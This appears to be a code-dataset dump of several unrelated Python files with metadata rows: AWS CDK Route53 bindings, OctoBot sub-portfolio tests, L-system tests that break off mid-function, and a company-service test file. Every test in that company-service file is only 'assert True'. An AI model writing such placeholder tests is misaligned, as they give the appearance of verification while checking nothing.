return typing.cast(None, jsii.invoke(self, "addDelegation", [delegate, opts]))
@jsii.member(jsii_name="addVpc")
def add_vpc(self, _vpc: aws_cdk.aws_ec2.IVpc) -> None:
'''Add another VPC to this private hosted zone.
:param _vpc: -
'''
return typing.cast(None, jsii.invoke(self, "addVpc", [_vpc]))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="crossAccountZoneDelegationRole")
def cross_account_zone_delegation_role(
self,
) -> typing.Optional[aws_cdk.aws_iam.Role]:
'''Role for cross account zone delegation.'''
return typing.cast(typing.Optional[aws_cdk.aws_iam.Role], jsii.get(self, "crossAccountZoneDelegationRole"))
class CaaAmazonRecord(
CaaRecord,
metaclass=jsii.JSIIMeta,
jsii_type="@aws-cdk/aws-route53.CaaAmazonRecord",
):
'''A DNS Amazon CAA record.
A CAA record to restrict certificate authorities allowed
to issue certificates for a domain to Amazon only.
:resource: AWS::Route53::RecordSet
'''
def __init__(
self,
scope: constructs.Construct,
id: builtins.str,
*,
zone: IHostedZone,
comment: typing.Optional[builtins.str] = None,
record_name: typing.Optional[builtins.str] = None,
ttl: typing.Optional[aws_cdk.core.Duration] = None,
) -> None:
'''
:param scope: -
:param id: -
:param zone: The hosted zone in which to define the new record.
:param comment: A comment to add on the record. Default: no comment
:param record_name: The domain name for this record. Default: zone root
:param ttl: The resource record cache time to live (TTL). Default: Duration.minutes(30)
'''
props = CaaAmazonRecordProps(
zone=zone, comment=comment, record_name=record_name, ttl=ttl
)
jsii.create(CaaAmazonRecord, self, [scope, id, props])
__all__ = [
"ARecord",
"ARecordProps",
"AaaaRecord",
"AaaaRecordProps",
"AddressRecordTarget",
"AliasRecordTargetConfig",
"CaaAmazonRecord",
"CaaAmazonRecordProps",
"CaaRecord",
"CaaRecordProps",
"CaaRecordValue",
"CaaTag",
"CfnDNSSEC",
"CfnDNSSECProps",
"CfnHealthCheck",
"CfnHealthCheckProps",
"CfnHostedZone",
"CfnHostedZoneProps",
"CfnKeySigningKey",
"CfnKeySigningKeyProps",
"CfnRecordSet",
"CfnRecordSetGroup",
"CfnRecordSetGroupProps",
"CfnRecordSetProps",
"CnameRecord",
"CnameRecordProps",
"CommonHostedZoneProps",
"CrossAccountZoneDelegationRecord",
"CrossAccountZoneDelegationRecordProps",
"DsRecord",
"DsRecordProps",
"HostedZone",
"HostedZoneAttributes",
"HostedZoneProps",
"HostedZoneProviderProps",
"IAliasRecordTarget",
"IHostedZone",
"IPrivateHostedZone",
"IPublicHostedZone",
"IRecordSet",
"MxRecord",
"MxRecordProps",
"MxRecordValue",
"NsRecord",
"NsRecordProps",
"PrivateHostedZone",
"PrivateHostedZoneProps",
"PublicHostedZone",
"PublicHostedZoneProps",
"RecordSet",
"RecordSetOptions",
"RecordSetProps",
"RecordTarget",
"RecordType",
"SrvRecord",
"SrvRecordProps",
"SrvRecordValue",
"TxtRecord",
"TxtRecordProps",
"VpcEndpointServiceDomainName",
"VpcEndpointServiceDomainNameProps",
"ZoneDelegationOptions",
"ZoneDelegationRecord",
"ZoneDelegationRecordProps",
]
publication.publish()
| 40.384787 | 262 | 0.654986 | 28,970 | 253,778 | 5.593925 | 0.027304 | 0.039709 | 0.040319 | 0.044583 | 0.858666 | 0.840574 | 0.821191 | 0.799224 | 0.780335 | 0.766815 | 0 | 0.007258 | 0.22472 | 253,778 | 6,283 | 263 | 40.391214 | 0.816411 | 0.308147 | 0 | 0.713893 | 0 | 0 | 0.124682 | 0.047985 | 0 | 0 | 0 | 0 | 0.020319 | 1 | 0.140582 | false | 0.001098 | 0.003569 | 0.037891 | 0.28391 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
702466c4e86d3ce69f93ba9d48ba05fcdfcedf08 | 416 | py | Python | company_service/test/server/test_app.py | KieshaJ/ras | 00b2f1c18ed235de894f8b90713c0a0eac9a396e | [
"MIT"
] | null | null | null | company_service/test/server/test_app.py | KieshaJ/ras | 00b2f1c18ed235de894f8b90713c0a0eac9a396e | [
"MIT"
] | null | null | null | company_service/test/server/test_app.py | KieshaJ/ras | 00b2f1c18ed235de894f8b90713c0a0eac9a396e | [
"MIT"
] | null | null | null | def test_add_company_success():
assert True
def test_add_company_failure():
assert True
def test_update_company_success():
assert True
def test_update_company_failure():
assert True
def test_delete_company_success():
assert True
def test_delete_company_failure():
assert True
def test_list_companies_success():
assert True
def test_list_companies_failure():
assert True
| 13.419355 | 34 | 0.754808 | 56 | 416 | 5.178571 | 0.214286 | 0.193103 | 0.313793 | 0.410345 | 0.896552 | 0.872414 | 0 | 0 | 0 | 0 | 0 | 0 | 0.1875 | 416 | 30 | 35 | 13.866667 | 0.857988 | 0 | 0 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.5 | 1 | 0.5 | true | 0 | 0 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8e8a4430b1d01d28387db3ddd98f759d59e0451c | 13,046 | py | Python | tests/unit_tests/trading_tests/test_sub_portfolio.py | CryptoRichy/OctoBot | 1ca5bd2ba4b8fc09859518fcb2a62f74a1435019 | [
"Apache-2.0"
] | 1 | 2018-11-26T16:43:36.000Z | 2018-11-26T16:43:36.000Z | tests/unit_tests/trading_tests/test_sub_portfolio.py | CryptoRichy/OctoBot | 1ca5bd2ba4b8fc09859518fcb2a62f74a1435019 | [
"Apache-2.0"
] | null | null | null | tests/unit_tests/trading_tests/test_sub_portfolio.py | CryptoRichy/OctoBot | 1ca5bd2ba4b8fc09859518fcb2a62f74a1435019 | [
"Apache-2.0"
] | null | null | null | import ccxt
from config.cst import TraderOrderType
from tests.test_utils.config import load_test_config
from tests.test_utils.order_util import fill_market_order, fill_limit_or_stop_order
from trading.exchanges.exchange_manager import ExchangeManager
from trading.trader.order import BuyMarketOrder, OrderConstants, SellLimitOrder, BuyLimitOrder, SellMarketOrder
from trading.trader.portfolio import Portfolio
from trading.trader.sub_portfolio import SubPortfolio
from trading.trader.trader_simulator import TraderSimulator
class TestSubPortfolio:
DEFAULT_PERCENT = 0.4
@staticmethod
def init_default():
config = load_test_config()
exchange_manager = ExchangeManager(config, ccxt.binance, is_simulated=True)
exchange_inst = exchange_manager.get_exchange()
trader_inst = TraderSimulator(config, exchange_inst, 1)
portfolio_inst = Portfolio(config, trader_inst)
trader_inst.stop_order_manager()
sub_portfolio_inst = SubPortfolio(config, trader_inst, portfolio_inst, TestSubPortfolio.DEFAULT_PERCENT)
return config, portfolio_inst, exchange_inst, trader_inst, sub_portfolio_inst
def test_load_portfolio(self):
_, _, _, _, sub_portfolio_inst = self.init_default()
sub_portfolio_inst._load_portfolio()
assert sub_portfolio_inst.portfolio == {'BTC': {'available': 10 * self.DEFAULT_PERCENT,
'total': 10 * self.DEFAULT_PERCENT},
'USD': {'available': 1000 * self.DEFAULT_PERCENT,
'total': 1000 * self.DEFAULT_PERCENT}
}
def test_get_currency_portfolio(self):
_, _, _, _, sub_portfolio_inst = self.init_default()
assert sub_portfolio_inst.get_currency_portfolio("BTC", Portfolio.AVAILABLE) == 10 * self.DEFAULT_PERCENT
assert sub_portfolio_inst.get_currency_portfolio("BTC", Portfolio.TOTAL) == 10 * self.DEFAULT_PERCENT
assert sub_portfolio_inst.get_currency_portfolio("NANO", Portfolio.TOTAL) == 0
def test_get_currency_multiple_sub_portfolio(self):
config, portfolio_inst, exchange_inst, trader_inst, sub_portfolio_inst = self.init_default()
sub_portfolio_inst_2 = SubPortfolio(config, trader_inst, portfolio_inst, 0.2)
sub_portfolio_inst_3 = SubPortfolio(config, trader_inst, portfolio_inst, 0.1)
sub_portfolio_inst_4 = SubPortfolio(config, trader_inst, portfolio_inst, 0.7)
assert sub_portfolio_inst_2.get_currency_portfolio("BTC", Portfolio.AVAILABLE) == 10 * 0.2
assert sub_portfolio_inst_2.get_currency_portfolio("BTC", Portfolio.TOTAL) == 10 * 0.2
assert sub_portfolio_inst_2.get_currency_portfolio("NANO", Portfolio.TOTAL) == 0
assert sub_portfolio_inst_3.get_currency_portfolio("BTC", Portfolio.AVAILABLE) == 10 * 0.1
assert sub_portfolio_inst_3.get_currency_portfolio("BTC", Portfolio.TOTAL) == 10 * 0.1
assert sub_portfolio_inst_3.get_currency_portfolio("NANO", Portfolio.TOTAL) == 0
assert sub_portfolio_inst_4.get_currency_portfolio("BTC", Portfolio.AVAILABLE) == 10 * 0.7
assert sub_portfolio_inst_4.get_currency_portfolio("BTC", Portfolio.TOTAL) == 10 * 0.7
assert sub_portfolio_inst_4.get_currency_portfolio("NANO", Portfolio.TOTAL) == 0
def test_update_portfolio_available(self):
_, portfolio_inst, _, trader_inst, sub_portfolio_inst = self.init_default()
# Test buy order
market_buy = BuyMarketOrder(trader_inst)
market_buy.new(OrderConstants.TraderOrderTypeClasses[TraderOrderType.BUY_MARKET],
"BTC/USD",
70,
10,
70)
# test sub
# test buy order creation
sub_portfolio_inst.update_portfolio_available(market_buy, True)
assert sub_portfolio_inst.get_currency_portfolio("BTC", Portfolio.AVAILABLE) == 10 * self.DEFAULT_PERCENT
assert sub_portfolio_inst.get_currency_portfolio("USD", Portfolio.AVAILABLE) == 1000*self.DEFAULT_PERCENT-700
assert sub_portfolio_inst.get_currency_portfolio("BTC", Portfolio.TOTAL) == 10 * self.DEFAULT_PERCENT
assert sub_portfolio_inst.get_currency_portfolio("USD", Portfolio.TOTAL) == 1000 * self.DEFAULT_PERCENT
# test parent
assert portfolio_inst.get_currency_portfolio("BTC", Portfolio.AVAILABLE) == 10
assert portfolio_inst.get_currency_portfolio("USD", Portfolio.AVAILABLE) == 300
assert portfolio_inst.get_currency_portfolio("BTC", Portfolio.TOTAL) == 10
assert portfolio_inst.get_currency_portfolio("USD", Portfolio.TOTAL) == 1000
# test buy order canceled --> return to init state and the update_portfolio will sync TOTAL with AVAILABLE
sub_portfolio_inst.update_portfolio_available(market_buy, False)
assert sub_portfolio_inst.get_currency_portfolio("BTC", Portfolio.AVAILABLE) == 10 * self.DEFAULT_PERCENT
assert sub_portfolio_inst.get_currency_portfolio("USD", Portfolio.AVAILABLE) == 1000 * self.DEFAULT_PERCENT
assert sub_portfolio_inst.get_currency_portfolio("BTC", Portfolio.TOTAL) == 10 * self.DEFAULT_PERCENT
assert sub_portfolio_inst.get_currency_portfolio("USD", Portfolio.TOTAL) == 1000 * self.DEFAULT_PERCENT
# test parent
assert portfolio_inst.get_currency_portfolio("BTC", Portfolio.AVAILABLE) == 10
assert portfolio_inst.get_currency_portfolio("USD", Portfolio.AVAILABLE) == 1000
assert portfolio_inst.get_currency_portfolio("BTC", Portfolio.TOTAL) == 10
assert portfolio_inst.get_currency_portfolio("USD", Portfolio.TOTAL) == 1000
# Test sell order
limit_sell = SellLimitOrder(trader_inst)
limit_sell.new(OrderConstants.TraderOrderTypeClasses[TraderOrderType.SELL_LIMIT],
"BTC/USD",
60,
8,
60)
# test sub
# test sell order creation
sub_portfolio_inst.update_portfolio_available(limit_sell, True)
assert sub_portfolio_inst.get_currency_portfolio("BTC", Portfolio.AVAILABLE) == 10 * self.DEFAULT_PERCENT - 8
assert sub_portfolio_inst.get_currency_portfolio("USD", Portfolio.AVAILABLE) == 1000 * self.DEFAULT_PERCENT
assert sub_portfolio_inst.get_currency_portfolio("BTC", Portfolio.TOTAL) == 10 * self.DEFAULT_PERCENT
assert sub_portfolio_inst.get_currency_portfolio("USD", Portfolio.TOTAL) == 1000 * self.DEFAULT_PERCENT
# test parent
assert portfolio_inst.get_currency_portfolio("BTC", Portfolio.AVAILABLE) == 2
assert portfolio_inst.get_currency_portfolio("USD", Portfolio.AVAILABLE) == 1000
assert portfolio_inst.get_currency_portfolio("BTC", Portfolio.TOTAL) == 10
assert portfolio_inst.get_currency_portfolio("USD", Portfolio.TOTAL) == 1000
# test sell order canceled --> return to init state and the update_portfolio will sync TOTAL with AVAILABLE
sub_portfolio_inst.update_portfolio_available(limit_sell, False)
assert sub_portfolio_inst.get_currency_portfolio("BTC", Portfolio.AVAILABLE) == 10 * self.DEFAULT_PERCENT
assert sub_portfolio_inst.get_currency_portfolio("USD", Portfolio.AVAILABLE) == 1000 * self.DEFAULT_PERCENT
assert sub_portfolio_inst.get_currency_portfolio("BTC", Portfolio.TOTAL) == 10 * self.DEFAULT_PERCENT
assert sub_portfolio_inst.get_currency_portfolio("USD", Portfolio.TOTAL) == 1000 * self.DEFAULT_PERCENT
# test parent
assert portfolio_inst.get_currency_portfolio("BTC", Portfolio.AVAILABLE) == 10
assert portfolio_inst.get_currency_portfolio("USD", Portfolio.AVAILABLE) == 1000
assert portfolio_inst.get_currency_portfolio("BTC", Portfolio.TOTAL) == 10
assert portfolio_inst.get_currency_portfolio("USD", Portfolio.TOTAL) == 1000
def test_update_portfolio(self):
_, portfolio_inst, _, trader_inst, sub_portfolio_inst = self.init_default()
# Test buy order
limit_buy = BuyLimitOrder(trader_inst)
limit_buy.new(OrderConstants.TraderOrderTypeClasses[TraderOrderType.BUY_LIMIT],
"BTC/USD",
70,
10,
70)
# update portfolio with creations
sub_portfolio_inst.update_portfolio_available(limit_buy, True)
assert sub_portfolio_inst.get_currency_portfolio("BTC", Portfolio.AVAILABLE) == 10 * self.DEFAULT_PERCENT
assert sub_portfolio_inst.get_currency_portfolio("USD", Portfolio.AVAILABLE) == 1000*self.DEFAULT_PERCENT - 700
# test parent
assert portfolio_inst.get_currency_portfolio("BTC", Portfolio.AVAILABLE) == 10
assert portfolio_inst.get_currency_portfolio("USD", Portfolio.AVAILABLE) == 300
fill_limit_or_stop_order(limit_buy, 69, 71)
sub_portfolio_inst.update_portfolio(limit_buy)
assert sub_portfolio_inst.get_currency_portfolio("BTC", Portfolio.AVAILABLE) == (10 * self.DEFAULT_PERCENT)+10
assert sub_portfolio_inst.get_currency_portfolio("USD", Portfolio.AVAILABLE) == 1000*self.DEFAULT_PERCENT-700
assert sub_portfolio_inst.get_currency_portfolio("BTC", Portfolio.TOTAL) == (10 * self.DEFAULT_PERCENT) + 10
assert sub_portfolio_inst.get_currency_portfolio("USD", Portfolio.TOTAL) == 1000 * self.DEFAULT_PERCENT - 700
# test parent
assert portfolio_inst.get_currency_portfolio("BTC", Portfolio.AVAILABLE) == 20
assert portfolio_inst.get_currency_portfolio("USD", Portfolio.AVAILABLE) == 300
assert portfolio_inst.get_currency_portfolio("BTC", Portfolio.TOTAL) == 20
assert portfolio_inst.get_currency_portfolio("USD", Portfolio.TOTAL) == 300
# Test buy order
market_sell = SellMarketOrder(trader_inst)
market_sell.new(OrderConstants.TraderOrderTypeClasses[TraderOrderType.SELL_MARKET],
"BTC/USD",
80,
8,
80)
# update portfolio with creations
sub_portfolio_inst.update_portfolio_available(market_sell, True)
assert sub_portfolio_inst.get_currency_portfolio("BTC", Portfolio.AVAILABLE) == 10*self.DEFAULT_PERCENT + 2
assert sub_portfolio_inst.get_currency_portfolio("USD", Portfolio.AVAILABLE) == 1000*self.DEFAULT_PERCENT-700
# test parent
assert portfolio_inst.get_currency_portfolio("BTC", Portfolio.AVAILABLE) == 12
assert portfolio_inst.get_currency_portfolio("USD", Portfolio.AVAILABLE) == 300
fill_market_order(market_sell, 80)
# when filling market sell
sub_portfolio_inst.update_portfolio(market_sell)
assert sub_portfolio_inst.get_currency_portfolio("BTC", Portfolio.AVAILABLE) == 10*self.DEFAULT_PERCENT + 2
assert sub_portfolio_inst.get_currency_portfolio("USD", Portfolio.AVAILABLE) == 1000*self.DEFAULT_PERCENT-60
assert sub_portfolio_inst.get_currency_portfolio("BTC", Portfolio.TOTAL) == 10*self.DEFAULT_PERCENT + 2
assert sub_portfolio_inst.get_currency_portfolio("USD", Portfolio.TOTAL) == 1000*self.DEFAULT_PERCENT-60
# test parent
assert portfolio_inst.get_currency_portfolio("BTC", Portfolio.AVAILABLE) == 12
assert portfolio_inst.get_currency_portfolio("USD", Portfolio.AVAILABLE) == 940
assert portfolio_inst.get_currency_portfolio("BTC", Portfolio.TOTAL) == 12
assert portfolio_inst.get_currency_portfolio("USD", Portfolio.TOTAL) == 940
def test_reset_portfolio_available(self):
_, portfolio_inst, _, trader_inst, sub_portfolio_inst = self.init_default()
# Test buy order
limit_sell = SellLimitOrder(trader_inst)
limit_sell.new(OrderConstants.TraderOrderTypeClasses[TraderOrderType.SELL_LIMIT],
"BTC/USD",
90,
4,
90)
sub_portfolio_inst.update_portfolio_available(limit_sell, True)
sub_portfolio_inst.reset_portfolio_available()
assert sub_portfolio_inst.get_currency_portfolio("BTC", Portfolio.AVAILABLE) == 10*self.DEFAULT_PERCENT
assert sub_portfolio_inst.get_currency_portfolio("USD", Portfolio.AVAILABLE) == 1000*self.DEFAULT_PERCENT
assert sub_portfolio_inst.get_currency_portfolio("BTC", Portfolio.TOTAL) == 10*self.DEFAULT_PERCENT
assert sub_portfolio_inst.get_currency_portfolio("USD", Portfolio.TOTAL) == 1000*self.DEFAULT_PERCENT
# test parent
assert portfolio_inst.get_currency_portfolio("BTC", Portfolio.AVAILABLE) == 10
assert portfolio_inst.get_currency_portfolio("USD", Portfolio.AVAILABLE) == 1000
assert portfolio_inst.get_currency_portfolio("BTC", Portfolio.TOTAL) == 10
assert portfolio_inst.get_currency_portfolio("USD", Portfolio.TOTAL) == 1000
| 59.031674 | 119 | 0.709413 | 1,516 | 13,046 | 5.764512 | 0.063325 | 0.162147 | 0.176222 | 0.184003 | 0.853301 | 0.826067 | 0.800435 | 0.784758 | 0.763131 | 0.71713 | 0 | 0.029752 | 0.203894 | 13,046 | 220 | 120 | 59.3 | 0.81167 | 0.042159 | 0 | 0.475 | 0 | 0 | 0.024134 | 0 | 0 | 0 | 0 | 0 | 0.48125 | 1 | 0.04375 | false | 0 | 0.05625 | 0 | 0.11875 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
8ea0428ad2da8c84a15293199146ec16872be06c | 9,181 | py | Python | lsys/tests/test_lsys.py | austinorr/lsys | 129b1af925b55cc7450efc2f4fe875225c33b578 | [
"BSD-3-Clause"
] | null | null | null | lsys/tests/test_lsys.py | austinorr/lsys | 129b1af925b55cc7450efc2f4fe875225c33b578 | [
"BSD-3-Clause"
] | 2 | 2018-10-14T00:39:28.000Z | 2018-10-14T17:35:43.000Z | lsys/tests/test_lsys.py | austinorr/lsys | 129b1af925b55cc7450efc2f4fe875225c33b578 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
test_lsys
----------------------------------
Tests for `lsys` module.
"""
import pytest
from contextlib import contextmanager
import lsys
result_at_depth_2 = {
'Bush1': 'FF+[+F-F-F]-[-F+F+F]FF+[+F-F-F]-[-F+F+F]+[+FF+[+F-F-F]-[-F+F+'
'F]-FF+[+F-F-F]-[-F+F+F]-FF+[+F-F-F]-[-F+F+F]]-[-FF+[+F-F-F]-[-F+F+'
'F]+FF+[+F-F-F]-[-F+F+F]+FF+[+F-F-F]-[-F+F+F]]',
'Bush2': '1.[+2.[+F]2.[-F]+F]1.[-2.[+F]2.[-F]+F]+2.[+F]2.[-F]+F',
'Crosses': 'VVFX+FX+FXFY-FY-+VFX+FX+FXFY-FY-+VFX+FX+FXFY-FY-V+FX+FXFY-F'
'Y-FY-V+FX+FXFY-FY-FY-',
'Dragon': 'FX+YF++-FX-YF+',
'Dragon45': 'L+F+R+F+L-F-R+F+L+F+R-F-L-F-R+F+L+F+R+F+L-F-R-F-L+F+R-F-L-F-R',
'Gosper': 'A-B--B+A++AA+B--+A-BB--B-A++A+B--+A-BB--B-A++A+B+A-B--B+A++A'
'A+B-++A-B--B+A++AA+B-A-B--B+A++AA+B-++A-BB--B-A++A+B-',
'Hexdragon': 'F+L+F-L-F+L+F+L+F-L-F-L-F+L+F-L-F',
'Hilbert': '+-+RF-LFL-FR+F+-LF+RFR+FL-F-LF+RFR+FL-+F+RF-LFL-FR+-F-+-LF+'
'RFR+FL-F-+RF-LFL-FR+F+RF-LFL-FR+-F-LF+RFR+FL-+F+-LF+RFR+FL-F-+RF-L'
'FL-FR+F+RF-LFL-FR+-F-LF+RFR+FL-+-F-+RF-LFL-FR+F+-LF+RFR+FL-F-LF+RF'
'R+FL-+F+RF-LFL-FR+-+',
'Penrose_Snowflake': 'F4-F4-F10-F++F4-F4-F4-F4-F10-F++F4-F4-F4-F4-F10-F'
'++F4-F10-F4-F4-F10-F++F4-F++F4-F4-F10-F++F4-F4-F4-F4-F10-F++F4-F4-'
'F4-F4-F10-F++F4-F4-F4-F4-F10-F++F4-F4-F4-F4-F10-F++F4-F10-F4-F4-F1'
'0-F++F4-F++F4-F4-F10-F++F4-F4-F4-F4-F10-F++F4-F4-F4-F4-F10-F++F4-F'
'4-F4-F4-F10-F++F4-F4-F4-F4-F10-F++F4-F10-F4-F4-F10-F++F4-F++F4-F4-'
'F10-F++F4-F4-F4-F4-F10-F++F4-F4-F4-F4-F10-F++F4-F4-F4-F4-F10-F++F4'
'-F4-F4-F4-F10-F++F4-F10-F4-F4-F10-F++F4-F++F4-F4-F10-F++F4-F4-F4-F'
'4-F10-F++F4-F4-F4-F4-F10-F++F4-F4-F4-F4-F10-F++F4-F4-F4-F4-F10-F++'
'F4-F10-F4-F4-F10-F++F4-F++F4-F4-F10-F++F4-F4-F4-F4-F10-F++F4-F',
'Plant_a': 'F[+F]F[-F]F[+F[+F]F[-F]F]F[+F]F[-F]F[-F[+F]F[-F]F]F[+F]F[-F'
']F',
'Plant_b': 'F[+F]F[-F][F][+F[+F]F[-F][F]]F[+F]F[-F][F][-F[+F]F[-F][F]]['
'F[+F]F[-F][F]]',
'Plant_c': 'FF-[-F+F+F]+[+F-F-F]FF-[-F+F+F]+[+F-F-F]-[-FF-[-F+F+F]+[+F-'
'F-F]+FF-[-F+F+F]+[+F-F-F]+FF-[-F+F+F]+[+F-F-F]]+[+FF-[-F+F+F]+[+F-'
'F-F]-FF-[-F+F+F]+[+F-F-F]-FF-[-F+F+F]+[+F-F-F]]',
'Plant_d': 'FFFF[+FF[+F[+X]F[-X]+X]FF[-F[+X]F[-X]+X]+F[+X]F[-X]+X]FFFF['
'-FF[+F[+X]F[-X]+X]FF[-F[+X]F[-X]+X]+F[+X]F[-X]+X]+FF[+F[+X]F[-X]+X'
']FF[-F[+X]F[-X]+X]+F[+X]F[-X]+X',
'Plant_e': 'FFFF[+FF[+F[+X][-X]FX][-F[+X][-X]FX]FFF[+X][-X]FX][-FF[+F[+'
'X][-X]FX][-F[+X][-X]FX]FFF[+X][-X]FX]FFFFFF[+F[+X][-X]FX][-F[+X][-'
'X]FX]FFF[+X][-X]FX',
'Plant_f': 'FFFF-[[FF-[[F-[[X]+X]+F[+FX]-X]+F-[[X]+X]+F[+FX]-X]+FF[+FFF'
'-[[X]+X]+F[+FX]-X]-F-[[X]+X]+F[+FX]-X]+FF-[[F-[[X]+X]+F[+FX]-X]+F-'
'[[X]+X]+F[+FX]-X]+FF[+FFF-[[X]+X]+F[+FX]-X]-F-[[X]+X]+F[+FX]-X]+FF'
'FF[+FFFFFF-[[F-[[X]+X]+F[+FX]-X]+F-[[X]+X]+F[+FX]-X]+FF[+FFF-[[X]+'
'X]+F[+FX]-X]-F-[[X]+X]+F[+FX]-X]-FF-[[F-[[X]+X]+F[+FX]-X]+F-[[X]+X'
']+F[+FX]-X]+FF[+FFF-[[X]+X]+F[+FX]-X]-F-[[X]+X]+F[+FX]-X',
'Putmans_Tattoo': '-FFFF[-FF+FF[-F+FXF+F]+F-FXF-F+FF+FF]+FF-FF[-F+FXF+F'
']+F-FXF-F+FF-FF+FFFF--FFFF[-FF+FF[-F+FXF+F]+F-FXF-F+FF+FF]+FF-FF[-'
'F+FXF+F]+F-FXF-F+FF-FF+FFFF--FFFF[-FF+FF[-F+FXF+F]+F-FXF-F+FF+FF]+'
'FF-FF[-F+FXF+F]+F-FXF-F+FF-FF+FFFF',
'QuadKochIsland': 'F-F+F+FF-F-F+F-F-F+F+FF-F-F+F+F-F+F+FF-F-F+F+F-F+F+F'
'F-F-F+FF-F+F+FF-F-F+F-F-F+F+FF-F-F+F-F-F+F+FF-F-F+F+F-F+F+FF-F-F+F'
'-F-F+F+FF-F-F+F-F-F+F+FF-F-F+F+F-F+F+FF-F-F+F+F-F+F+FF-F-F+FF-F+F+'
'FF-F-F+F-F-F+F+FF-F-F+F-F-F+F+FF-F-F+F+F-F+F+FF-F-F+F-F-F+F+FF-F-F'
'+F-F-F+F+FF-F-F+F+F-F+F+FF-F-F+F+F-F+F+FF-F-F+FF-F+F+FF-F-F+F-F-F+'
'F+FF-F-F+F-F-F+F+FF-F-F+F+F-F+F+FF-F-F+F-F-F+F+FF-F-F+F-F-F+F+FF-F'
'-F+F+F-F+F+FF-F-F+F+F-F+F+FF-F-F+FF-F+F+FF-F-F+F-F-F+F+FF-F-F+F-F-'
'F+F+FF-F-F+F+F-F+F+FF-F-F+F',
'Serpinski_Curve': 'XF-YF-XF+YF+XF+YF+XF-YF-XF',
'Serpinski_Gasket': 'F--F--F--GG--F--F--F--GG--F--F--F--GG--GGGG--F--F-'
'-F--GG--F--F--F--GG--F--F--F--GG--GGGG--F--F--F--GG--F--F--F--GG--'
'F--F--F--GG--GGGG',
'SquareSpikes': 'F17-F34+F17-F17-F17-F34+F17-F34+F17-F34+F17-F17-F17-F3'
'4+F17-F18-F17-F34+F17-F17-F17-F34+F17-F34+F17-F34+F17-F17-F17-F34+'
'F17-F18-F17-F34+F17-F17-F17-F34+F17-F34+F17-F34+F17-F17-F17-F34+F1'
'7-F18-F17-F34+F17-F17-F17-F34+F17-F34+F17-F34+F17-F17-F17-F34+F17-'
'F',
'Terdragon': 'F-F+F-F-F+F+F-F+F',
'Tree1': '1.1.[3-2.2.[3-F][3+F]2.[--F][++F]2.F][3+2.2.[3-F][3+F]2.[--F]'
'[++F]2.F]1.[--2.2.[3-F][3+F]2.[--F][++F]2.F][++2.2.[3-F][3+F]2.[--'
'F][++F]2.F]1.2.2.[3-F][3+F]2.[--F][++F]2.F',
'Tree2': '1.[5+2.[5+F][7-F]-2.[4+F][6-F]-2.[3+F][5-F]-2.F][7-2.[5+F][7-'
'F]-2.[4+F][6-F]-2.[3+F][5-F]-2.F]-1.[4+2.[5+F][7-F]-2.[4+F][6-F]-2'
'.[3+F][5-F]-2.F][6-2.[5+F][7-F]-2.[4+F][6-F]-2.[3+F][5-F]-2.F]-1.['
'3+2.[5+F][7-F]-2.[4+F][6-F]-2.[3+F][5-F]-2.F][5-2.[5+F][7-F]-2.[4+'
'F][6-F]-2.[3+F][5-F]-2.F]-1.2.[5+F][7-F]-2.[4+F][6-F]-2.[3+F][5-F]'
'-2.F',
'Tree3': '1.[--2.[--F][+F]-F][+2.[--F][+F]-F]-2.[--F][+F]-F',
'Twig': '1.[-2.[-F][+F]][+2.[-F][+F]]',
'Two_Ys': '[1.[+2.[+F][-F]][-2.[+F][-F]]]4-1.[+2.[+F][-F]][-2.[+F][-F]]',
'Weed1': 'F[-F]F[+F]F[-F[-F]F[+F]F]F[-F]F[+F]F[+F[-F]F[+F]F]F[-F]F[+F]F',
'Weed2': '1.[-2.[-F]2.[+F]F]1.[+2.[-F]2.[+F]F]2.[-F]2.[+F]F',
'Weed3': '1.[-2.[-F]2.[+F][-F]F]1.[+2.[-F]2.[+F][-F]F][-2.[-F]2.[+F][-F'
']F]2.[-F]2.[+F][-F]F'}
@pytest.mark.parametrize(('rule', 'expected'),
[("X = X+YF+, Y = -FX-Y", {'X': 'X+YF+',
'Y': '-FX-Y'}),
("X : X+yF+; y => -fX-y",
{'X': 'X+YF+', 'Y': '-FX-Y'}),
('X:FX+FX+FXFY-FY-; Y->+FX+FXFY-FY-FY, F= V',
{'F': 'V', 'X': 'FX+FX+FXFY-FY-',
'Y': '+FX+FXFY-FY-FY'}),
('F=|[+F]|[-F]+F', {'F': '|[+F]|[-F]+F'}),
({'X ': ' X+YF+', ' Y': '-FX-Y '},
{'X': 'X+YF+', 'Y': '-FX-Y'})
])
def test_clean_rule(rule, expected):
rule_result = lsys.Lsys.clean_rule(rule)
assert(rule_result == expected)
@pytest.mark.parametrize(('axiom', 'rule', 'depth', 'expected'),
[
("FX", {'X': 'X+YF+', 'Y': '-FX-Y'}, 3, 'FX+YF++-FX-YF++-FX+YF+--FX-YF+'),
("0", {'0': '010', '1': '011'}, 3, '010011010010011011010011010'),
('a', dict(a='a-b', b='+b-a'), 2, 'a-b-+b-a'),
('F', {'F': '||F'}, 2, '1.1.2.2.F'),
('F', {'F': '||F'}, 0, 'F'),
('F', {'F': '||F'}, 1, '1.1.F'),
])
def test_expand(axiom, rule, depth, expected):
result = lsys.Lsys.expand(axiom, rule, depth)
assert(result == expected.replace(".", "|"))
def test_expand_fractal_dict():
fractal_dict = lsys.fractals.Fractal
for n in ['Dragon', 'Terdragon', 'Serpinski_Gasket', 'Tree1', 'SquareSpikes', 'Plant_f']:
f = fractal_dict[n]
